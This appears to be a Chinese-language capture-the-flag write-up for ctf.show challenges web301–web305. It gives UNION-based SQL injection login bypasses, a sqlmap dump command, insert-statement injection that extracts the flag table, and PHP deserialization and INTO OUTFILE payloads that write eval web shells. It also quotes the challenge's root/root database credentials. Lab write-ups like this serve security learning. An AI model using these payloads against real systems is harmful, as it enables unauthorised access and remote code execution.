web301

在checklogin.php 发现了

$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";

在联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据就相当于构造了一个虚拟账户，可以使用这个账户登录

mysql的特性， 在联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据就相当于构造了一个虚拟账户，可以使用这个账户登录

然后我们就伪造了密码，就可以进行登录了

username:
-1' union select 1#
password:
1

sqlmap
python .\sqlmap.py -u "http://fddf2115-423b-4701-b77b-8ef5f2194ee7.challenge.ctf.show:8080/" --form --batch --dump

userid=a' union select "<?php eval($_POST[1]);?>" into outfile "/var/www/html/shell.php"%23&userpwd=1
然后访问shell.php再rce

web302

if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){
改变的地方

<?php
function sds_decode($str){return md5(md5($str.md5(base64_encode("sds")))."sds");
}
$str=1;
var_dump(sds_decode($str));
?>
这里$str随便命令，相应的把密码改了就行了

userid:
-1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#
userpass:
1

web303

在文件里面就看到了

if(strlen($username)>6){die();
}

然后就没看到啥了
也没看到

$sql="insert into sds_dpt set sds_name='".$dpt_name."',sds_address ='".$dpt_address."',sds_build_date='".$dpt_build_year."',sds_have_safe_card='".$dpt_has_cert."',sds_safe_card_num='".$dpt_cert_number."',sds_telephone='".$dpt_telephone_number."';";
这里使用insert注入

在dptadd.php注入
dpt_name=-1',sds_address=(select group_concat(table_name) from information_schema.tables where table_schema=database())#dpt_name=-1',sds_address=(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#dpt_name=-1',sds_address=(select flag from sds_fl9g)#

web304

function sds_waf($str){return preg_match('/[0-9]|[a-z]|-/i', $str);
}
正则过滤了这些东西，那么

做法与上题一样，没啥区别，不知道过滤的啥

web305

多了这一段

$user_cookie = $_COOKIE['user'];
if(isset($user_cookie)){$user = unserialize($user_cookie);
}

而且还在fun.php里面多了

function sds_waf($str){if(preg_match('/\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\"|\,|\.|\?|\/|\\\|\<|\>/', $str)){return false;}else{return true;}
}
?>

利用序列化写个小马

<?php
class user{public $username;public $password;public function __construct($u,$p){$this->username=$u;$this->password=$p;}public function __destruct(){file_put_contents($this->username, $this->password);}
}
$a=new user('1.php','<?php eval($_POST[1]);?>');
echo urlencode(serialize($a));?>

在corn.php中发现远程SQL

$mysqluser="root";
$mysqlpwd="root";
$mysqldb="sds";
$mysqlhost="localhost";
$mysqlport="3306";

找了好久终于知道怎么用antsword链接数据库了，右击数据管理
我还在这里写注入语句，我真傻逼